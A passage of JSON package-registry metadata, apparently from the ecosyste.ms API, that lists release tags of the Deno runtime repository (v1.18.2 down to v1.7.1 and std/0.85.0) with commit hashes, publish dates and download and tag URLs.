anifests"},{"name":"v1.18.2","sha":"ac4311880fd59383e1408647581cf996fb53fec9","kind":"commit","published_at":"2022-02-04T00:07:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.2/manifests"},{"name":"v1.18.1","sha":"0c931060784ee83082f7c221374aed451d4f1ad6","kind":"commit","published_at":"2022-01-27T16:33:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.1/manifests"},{"name":"v1.18.0","sha":"2ea535c8c1817a20a3915e350242423ee71cfa73","kind":"commit","published_at":"2022-01-20T16:19:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.0/manifests"},{"name":"v1.17.3","sha":"df5fe5a35f8ace40275a822927f3385c828beba7","kind":"commit","published_at":"2022-01-12T16:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.3/manifests"},{"name":"v1.17.2","sha":"ad4a07789441097ca477ebf796c31823b422db7a","kind":"commit","published_at":"2022-01-05T17:22:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.2/manifests"},{"name":"v1.17.1","sha":"ded77918fbd324c6d4038127bfce60380d56397d","kind":"commit","published_at":"2021-12-22T17:48:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.1/manifests"},{"name":"v1.17.0","sha":"5f11f87495effaf9b4ce6c8c615cdce3d50d91f8","kind":"commit","published_at":"2021-12-16T18:24:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.0/manifests"},{"name":"v1.16.4","sha":"ab286750a8c87215a9651efb11fcc620f2914005","kind":"commit","published_at":"2021-12-03T18:43:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.4/manifests"},{"name":"v1.16.3","sha":"bfa2f30529921155551e8b288bcda1e01c468b79","kind":"tag","published_at":"2021-11-24T23:06:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.3/manifests"},{"name":"v1.16.2","sha":"4836ab769c00c83b7c5488c4d9c5f185be858e70","kind":"commit","published_at":"2021-11-17T16:00:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.2/manifests"},{"name":"v1.16.1","sha":"fdf890a68d3d54d40c766fd78faeccb20bd2e2c6","kind":"commit","published_at":"2021-11-11T10:59:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.1/manifests"},{"name":"v1.16.0","sha":"1eae6c139ee1dac28df57d67d993792b773fa1ff","kind":"commit","published_at":"2021-11-09T12:55:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.0/manifests"},{"name":"v1.15.3","sha":"f32f458318819088d59f58b7a4c05f0d28e41dff","kind":"commit","published_at":"2021-10-25T11:11:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.3/manifests"},{"name":"v1.15.2","sha":"71da8140737a0ee81dd324e1156fd920a790c1cb","kind":"commit","published_at":"2021-10-18T19:01:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.2/manifests"},{"name":"v1.15.1","sha":"b1d63aefd9f150ed3acbc3d0a6c2f51dadad3d17","kind":"commit","published_at":"2021-10-13T07:48:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.1/manifests"},{"name":"v1.15.0","sha":"de3fa08d6cfac7edffb2411bbb42bb49af70dc82","kind":"commit","published_at":"2021-10-12T17:57:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.0/manifests"},{"name":"v1.14.3","sha":"1b7d6809f649318a0fb6f0e241c25885538bbe25","kind":"commit","published_at":"2021-10-04T22:03:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.3/manifests"},{"name":"v1.14.2","sha":"3ab682918a7cb9e23f8451eedb88074766d27049","kind":"commit","published_at":"2021-09-28T12:00:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.2/manifests"},{"name":"v1.14.1","sha":"f27902e749fb3a78ca35a0dc41c9fc53cd2806e1","kind":"commit","published_at":"2021-09-21T22:44:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.1/manifests"},{"name":"v1.14.0","sha":"f92cc66f0dbf8e9753f2e98d4469190f3b561eb0","kind":"commit","published_at":"2021-09-14T20:46:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.0/manifests"},{"name":"v1.13.2","sha":"7b882cc05f02e9b09e9ec2856e37730ae947f509","kind":"commit","published_at":"2021-08-23T20:58:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.2/manifests"},{"name":"v1.13.1","sha":"c67f6c13cd1de22e32f81723bc9224b8e2103a7a","kind":"commit","published_at":"2021-08-16T21:42:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.1/manifests"},{"name":"v1.13.0","sha":"d82351d67784a2bcb5431ebb233abc727f673152","kind":"commit","published_at":"2021-08-10T14:22:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.0/manifests"},{"name":"v1.12.2","sha":"dfba7a2b0197b05b3cb61724096111cc618aa747","kind":"commit","published_at":"2021-07-26T14:38:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.2/manifests"},{"name":"v1.12.1","sha":"7d69f06db88cf022f2c5c6e0b04493af7b50a98b","kind":"commit","published_at":"2021-07-19T19:09:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.1/manifests"},{"name":"v1.12.0","sha":"1ad6575028bd5a13eb0633cc5e7649e18deec556","kind":"commit","published_at":"2021-07-13T08:45:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.0/manifests"},{"name":"v1.11.5","sha":"1e57081906fd2c504c0e4895681bdc7386c1956f","kind":"commit","published_at":"2021-07-02T15:51:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.5/manifests"},{"name":"v1.11.4","sha":"ed16f4332263e81bf00a39ebc2200291b1fcbb8e","kind":"commit","published_at":"2021-07-01T11:57:51.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.4/manifests"},{"name":"v1.11.3","sha":"f4bed1081456089559c82441a13c4fb700840cac","kind":"commit","published_at":"2021-06-29T16:43:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.3/manifests"},{"name":"v1.11.2","sha":"2c0e482221cd86fdbdc055c76f1c214200419946","kind":"commit","published_at":"2021-06-21T15:47:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.2/manifests"},{"name":"v1.11.1","sha":"d7ce3adc8b97ebca61c1f527ea0f9b842d0a2dbe","kind":"commit","published_at":"2021-06-15T21:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.1/manifests"},{"name":"v1.11.0","sha":"b98293e21cb7e55def8fea2ca015381150d4cebf","kind":"commit","published_at":"2021-06-08T19:38:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.0/manifests"},{"name":"v1.10.3","sha":"1567c1013cc8ff12cf039137792da66a1d0015b5","kind":"tag","published_at":"2021-05-31T20:22:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.3/manifests"},{"name":"v1.10.2","sha":"232ec7798c5ee38e645c2aea31aea3e9a81e17f3","kind":"commit","published_at":"2021-05-17T15:28:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.2/manifests"},{"name":"v1.10.1","sha":"1cd1419e18386d512ab98849d132117182545b89","kind":"commit","published_at":"2021-05-12T03:11:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.1/manifests"},{"name":"v1.10.0","sha":"57927781ed7eb8bb088d656768dc295716407c7a","kind":"commit","published_at":"2021-05-12T00:06:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.0/manifests"},{"name":"v1.9.2","sha":"8074d8bcf3cdcc7e9a08df147e0082798a7c2760","kind":"commit","published_at":"2021-04-23T14:08:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.2/manifests"},{"name":"v1.9.1","sha":"7760d9a669552e69211b101d4656662a3dddf8dd","kind":"commit","published_at":"2021-04-20T23:46:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.1/manifests"},{"name":"v1.9.0","sha":"262ee78592209a1f8e449cfa1308dca9688a414e","kind":"commit","published_at":"2021-04-13T18:11:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.0/manifests"},{"name":"v1.8.3","sha":"2e6b78be9095cc38c392e2477711ff6eec226704","kind":"commit","published_at":"2021-04-02T10:10:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.3/manifests"},{"name":"v1.8.2","sha":"f50ed4e281e6c30120412271eb66a1fb67d1c63e","kind":"commit","published_at":"2021-03-21T20:12:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.2/manifests"},{"name":"v1.8.1","sha":"8d3baa7777b6bd2a2631e1b87a4676b520f2b447","kind":"commit","published_at":"2021-03-09T20:55:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.1/manifests"},{"name":"v1.8.0","sha":"18b894072d3eb6b04016e77ece0d78512f7ffca1","kind":"commit","published_at":"2021-03-02T23:23:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.0/manifests"},{"name":"v1.7.5","sha":"e9669bf0656c2478416f6705ff218539dc42c126","kind":"commit","published_at":"2021-02-19T14:58:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.5/manifests"},{"name":"v1.7.4","sha":"d2d7dc8d675d70f0061bdaf99ae4a08d84156aa9","kind":"commit","published_at":"2021-02-13T13:20:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.4/manifests"},{"name":"v1.7.3","sha":"f67b06939be5b754ecee306e9da1d7c0779c3cd6","kind":"commit","published_at":"2021-02-12T16:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.3/manifests"},{"name":"v1.7.2","sha":"647f11b3acc2f629a6d77836f5f6ef74ee10c4ce","kind":"commit","published_at":"2021-02-05T19:33:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.2/manifests"},{"name":"v1.7.1","sha":"11dd6f201378fe04cccadb46b7054cc2f791dda8","kind":"commit","published_at":"2021-01-29T14:53:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.1/manifests"},{"name":"std/0.85.0","sha":"11dd6f201378fe04cccadb46b7054cc2f791dda8","kind":"commit","published_at":"2021-01-29T14:53:03.000Z","d